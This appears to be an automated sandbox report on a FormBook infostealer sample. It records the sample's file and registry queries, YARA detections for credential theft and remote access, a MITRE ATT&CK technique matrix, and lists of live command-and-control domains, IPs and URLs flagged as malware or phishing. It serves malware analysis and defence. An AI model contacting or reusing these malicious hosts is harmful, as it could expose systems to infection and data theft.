Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	612 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	31 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	612 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Timestomp	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
881SP1exr1.exe	22%	ReversingLabs	Win32.Trojan.Generic
881SP1exr1.exe	35%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
www.candicrem.com	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.bollywood.nexusReferer:	0%	Avira URL Cloud	safe
http://www.candicrem.com/4hc5/	100%	Avira URL Cloud	malware
http://www.tcbbuilds.com/4hc5/www.therealnikib.com	100%	Avira URL Cloud	malware
http://www.vurporn.com	100%	Avira URL Cloud	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.7141999.com/4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0	100%	Avira URL Cloud	malware
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2	100%	Avira URL Cloud	phishing
http://www.quailrun-inc.com	100%	Avira URL Cloud	malware
http://www.showshoe.info/4hc5/	100%	Avira URL Cloud	malware
http://www.quailrun-inc.com/4hc5/	100%	Avira URL Cloud	malware
http://www.bollywood.nexus	100%	Avira URL Cloud	malware
http://www.modluxenwa.com	100%	Avira URL Cloud	malware
http://www.therealnikib.com	100%	Avira URL Cloud	malware
www.iqixuehe.com/4hc5/	100%	Avira URL Cloud	malware
http://www.lpqxmz.site/4hc5/www.tcbbuilds.com	100%	Avira URL Cloud	phishing
http://www.bollywood.nexus/4hc5/www.lpqxmz.site	100%	Avira URL Cloud	malware
http://www.motionmixmedia.com/4hc5/www.castlegrouplt.com	100%	Avira URL Cloud	malware
http://www.candicrem.comReferer:	0%	Avira URL Cloud	safe
http://www.7141999.com	100%	Avira URL Cloud	malware
http://www.7141999.com/4hc5/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.motionmixmedia.comReferer:	0%	Avira URL Cloud	safe
http://www.modluxenwa.com/4hc5/www.vurporn.com	100%	Avira URL Cloud	malware
http://www.slotjitu88.website	100%	Avira URL Cloud	phishing
http://www.iqixuehe.com/4hc5/www.candicrem.com	100%	Avira URL Cloud	malware
http://www.lpqxmz.siteReferer:	0%	Avira URL Cloud	safe
http://www.pacersun.comReferer:	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.showshoe.infoReferer:	0%	Avira URL Cloud	safe
http://www.therenixgroupllc.com/4hc5/www.7141999.com	100%	Avira URL Cloud	malware
http://www.therealnikib.com/4hc5/	100%	Avira URL Cloud	malware
http://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e	100%	Avira URL Cloud	malware
http://www.therealnikib.com/4hc5/www.slotjitu88.website	100%	Avira URL Cloud	malware
http://www.vurporn.com/4hc5/	100%	Avira URL Cloud	malware
http://www.castlegrouplt.comReferer:	0%	Avira URL Cloud	safe
http://www.vurporn.com/4hc5/www.motionmixmedia.com	100%	Avira URL Cloud	malware
http://www.lpqxmz.site	100%	Avira URL Cloud	malware
http://www.motionmixmedia.com/4hc5/	100%	Avira URL Cloud	malware
http://www.pacersun.com	100%	Avira URL Cloud	malware
http://www.therenixgroupllc.comReferer:	0%	Avira URL Cloud	safe
http://www.7141999.com/4hc5/www.pacersun.com	100%	Avira URL Cloud	malware
http://www.modluxenwa.com/4hc5/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.tcbbuilds.comReferer:	0%	Avira URL Cloud	safe
http://www.pacersun.com/4hc5/	100%	Avira URL Cloud	malware
http://www.tcbbuilds.com	100%	Avira URL Cloud	malware
http://www.pacersun.com/4hc5/www.showshoe.info	100%	Avira URL Cloud	malware
http://www.therealnikib.comReferer:	0%	Avira URL Cloud	safe
http://www.candicrem.com/4hc5/www.therenixgroupllc.com	100%	Avira URL Cloud	malware
http://www.vurporn.comReferer:	0%	Avira URL Cloud	safe
http://www.iqixuehe.com/4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv	100%	Avira URL Cloud	malware
http://www.quailrun-inc.com/4hc5/www.bollywood.nexus	100%	Avira URL Cloud	malware
http://www.quailrun-inc.comReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.candicrem.com	199.34.228.191	true	true	11%, Virustotal, Browse	unknown
flash.funnels.msgsndr.com	34.68.234.4	true	false		unknown
www.7141999.com	154.86.64.96	true	true		unknown
www.bollywood.nexus	3.64.163.50	true	true		unknown
pacersun.com	167.172.228.26	true	true		unknown
slotjitu88.website	45.64.97.60	true	true		unknown
parkingpage.namecheap.com	91.195.240.19	true	false		high
www.lpqxmz.site	103.120.80.111	true	true		unknown
d3at2k7gv5wser.cloudfront.net	13.32.208.72	true	false		high
www.iqixuehe.com	154.205.127.201	true	true		unknown
www.pacersun.com	unknown	unknown	true		unknown
www.slotjitu88.website	unknown	unknown	true		unknown
www.therenixgroupllc.com	unknown	unknown	true		unknown
www.therealnikib.com	unknown	unknown	true		unknown
www.quailrun-inc.com	unknown	unknown	true		unknown
www.tcbbuilds.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.7141999.com/4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0	true	Avira URL Cloud: malware	unknown
www.iqixuehe.com/4hc5/	true	Avira URL Cloud: malware	low
http://www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2	true	Avira URL Cloud: phishing	unknown
http://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e	false	Avira URL Cloud: malware	unknown
http://www.iqixuehe.com/4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tcbbuilds.com/4hc5/www.therealnikib.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.therealnikib.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.quailrun-inc.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.quailrun-inc.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.candicrem.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bollywood.nexus	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.vurporn.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
